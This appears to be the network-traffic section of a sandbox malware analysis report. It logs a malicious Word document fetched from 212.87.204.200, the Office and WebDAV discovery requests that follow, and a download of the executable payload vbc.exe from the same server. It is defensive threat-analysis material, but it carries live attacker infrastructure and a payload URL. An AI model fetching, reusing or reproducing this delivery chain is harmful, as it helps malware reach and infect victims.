Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
GET
200
http://212.87.204.200/O00-O.doc
REQUEST
RESPONSE
BODY
GET /O00-O.doc HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 212.87.204.200
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 04 Mar 2023 23:44:07 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
Last-Modified: Wed, 22 Feb 2023 14:33:25 GMT
ETag: "38ad-5f54ac76ebf73"
Accept-Ranges: bytes
Content-Length: 14509
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/msword
OPTIONS
302
http://212.87.204.200/
REQUEST
RESPONSE
BODY
OPTIONS / HTTP/1.1
User-Agent: Microsoft Office Protocol Discovery
Host: 212.87.204.200
Content-Length: 0
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Sat, 04 Mar 2023 23:44:17 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
X-Powered-By: PHP/8.1.12
Location: http://212.87.204.200/dashboard/
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
OPTIONS
302
http://212.87.204.200/
REQUEST
RESPONSE
BODY
OPTIONS / HTTP/1.1
User-Agent: Microsoft Office Protocol Discovery
Host: 212.87.204.200
Content-Length: 0
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Sat, 04 Mar 2023 23:44:17 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
X-Powered-By: PHP/8.1.12
Location: http://212.87.204.200/dashboard/
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
OPTIONS
302
http://212.87.204.200/
REQUEST
RESPONSE
BODY
OPTIONS / HTTP/1.1
User-Agent: Microsoft Office Protocol Discovery
Host: 212.87.204.200
Content-Length: 0
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Sat, 04 Mar 2023 23:44:17 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
X-Powered-By: PHP/8.1.12
Location: http://212.87.204.200/dashboard/
Content-Length: 0
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
HEAD
200
http://212.87.204.200/O00-O.doc
REQUEST
RESPONSE
BODY
HEAD /O00-O.doc HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft Office Existence Discovery
Host: 212.87.204.200
HTTP/1.1 200 OK
Date: Sat, 04 Mar 2023 23:44:18 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
Last-Modified: Wed, 22 Feb 2023 14:33:25 GMT
ETag: "38ad-5f54ac76ebf73"
Accept-Ranges: bytes
Content-Length: 14509
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/msword
OPTIONS
302
http://212.87.204.200/
REQUEST
RESPONSE
BODY
OPTIONS / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: 212.87.204.200
HTTP/1.1 302 Found
Date: Sat, 04 Mar 2023 23:44:22 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
X-Powered-By: PHP/8.1.12
Location: http://212.87.204.200/dashboard/
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
OPTIONS
200
http://212.87.204.200/dashboard/
REQUEST
RESPONSE
BODY
OPTIONS /dashboard/ HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: 212.87.204.200
HTTP/1.1 200 OK
Date: Sat, 04 Mar 2023 23:44:22 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
Allow: GET,POST,OPTIONS,HEAD,TRACE
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html
PROPFIND
302
http://212.87.204.200/
REQUEST
RESPONSE
BODY
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: 212.87.204.200
HTTP/1.1 302 Found
Date: Sat, 04 Mar 2023 23:44:23 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
X-Powered-By: PHP/8.1.12
Location: http://212.87.204.200/dashboard/
Content-Length: 0
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
PROPFIND
405
http://212.87.204.200/dashboard/
REQUEST
RESPONSE
BODY
PROPFIND /dashboard/ HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: 212.87.204.200
HTTP/1.1 405 Method Not Allowed
Date: Sat, 04 Mar 2023 23:44:23 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
Allow: GET,POST,OPTIONS,HEAD,TRACE
Content-Length: 330
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
PROPFIND
302
http://212.87.204.200/
REQUEST
RESPONSE
BODY
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: 212.87.204.200
HTTP/1.1 302 Found
Date: Sat, 04 Mar 2023 23:44:23 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
X-Powered-By: PHP/8.1.12
Location: http://212.87.204.200/dashboard/
Content-Length: 0
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
PROPFIND
405
http://212.87.204.200/dashboard/
REQUEST
RESPONSE
BODY
PROPFIND /dashboard/ HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: 212.87.204.200
HTTP/1.1 405 Method Not Allowed
Date: Sat, 04 Mar 2023 23:44:24 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
Allow: GET,POST,OPTIONS,HEAD,TRACE
Content-Length: 330
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
HEAD
200
http://212.87.204.200/O00-O.doc
REQUEST
RESPONSE
BODY
HEAD /O00-O.doc HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: 212.87.204.200
Content-Length: 0
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 04 Mar 2023 23:44:24 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
Last-Modified: Wed, 22 Feb 2023 14:33:25 GMT
ETag: "38ad-5f54ac76ebf73"
Accept-Ranges: bytes
Content-Length: 14509
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/msword
GET
200
http://212.87.204.200/5021/vbc.exe
REQUEST
RESPONSE
BODY
GET /5021/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MARKANYEPS#25118)
Host: 212.87.204.200
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 04 Mar 2023 23:44:25 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
Last-Modified: Thu, 23 Feb 2023 07:35:04 GMT
ETag: "b5000-5f5590d1d934c"
Accept-Ranges: bytes
Content-Length: 741376
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
PROPFIND
302
http://212.87.204.200/
REQUEST
RESPONSE
BODY
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: 212.87.204.200
HTTP/1.1 302 Found
Date: Sat, 04 Mar 2023 23:44:28 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
X-Powered-By: PHP/8.1.12
Location: http://212.87.204.200/dashboard/
Content-Length: 0
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
PROPFIND
405
http://212.87.204.200/dashboard/
REQUEST
RESPONSE
BODY
PROPFIND /dashboard/ HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: 212.87.204.200
HTTP/1.1 405 Method Not Allowed
Date: Sat, 04 Mar 2023 23:44:28 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
Allow: GET,POST,OPTIONS,HEAD,TRACE
Content-Length: 330
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
PROPFIND
302
http://212.87.204.200/
REQUEST
RESPONSE
BODY
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: 212.87.204.200
HTTP/1.1 302 Found
Date: Sat, 04 Mar 2023 23:44:28 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
X-Powered-By: PHP/8.1.12
Location: http://212.87.204.200/dashboard/
Content-Length: 0
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
PROPFIND
405
http://212.87.204.200/dashboard/
REQUEST
RESPONSE
BODY
PROPFIND /dashboard/ HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: 212.87.204.200
HTTP/1.1 405 Method Not Allowed
Date: Sat, 04 Mar 2023 23:44:28 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12
Allow: GET,POST,OPTIONS,HEAD,TRACE
Content-Length: 330
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts